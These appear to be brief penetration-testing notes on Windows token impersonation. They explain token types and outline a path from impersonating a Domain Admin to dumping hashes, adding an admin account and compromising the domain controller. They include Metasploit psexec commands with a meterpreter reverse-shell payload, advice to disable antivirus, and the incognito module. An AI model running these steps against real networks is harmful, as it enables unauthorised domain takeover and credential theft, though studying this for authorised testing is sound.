Overview

• What are tokens?
  • Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers.
• Two types:
  • Delegate - Created for logging into a machine or using Remote Desktop
  • Impersonate - “non-interactive” such as attaching a network drive or a domain logon script

Why It’s Bad:

• Pop a shell and load an incognito module.
• Impersonate a domain user and dump hashes, but not as a Domain Admin.

What if a Domain Admin Token is Available?

• Identify a Domain Admin user.
• Impersonate that user and dump hashes as Domain Admin — you’re in!

Better Example:

1. Impersonate a Domain Admin.
2. Add a new user with Domain Admin privileges.
3. Compromise the Domain Controller (DC).

Steps

1. Metasploit

   msfconsole
   use exploit/windows/smb/psexec
   set payload windows/x64/meterpreter/reverse_tcp
   set rhosts, smbuser, smbpass, smbdomain
   exploit {Turn off Virus & threat protection if denied}
   

2. Load the incognito module

   load incognito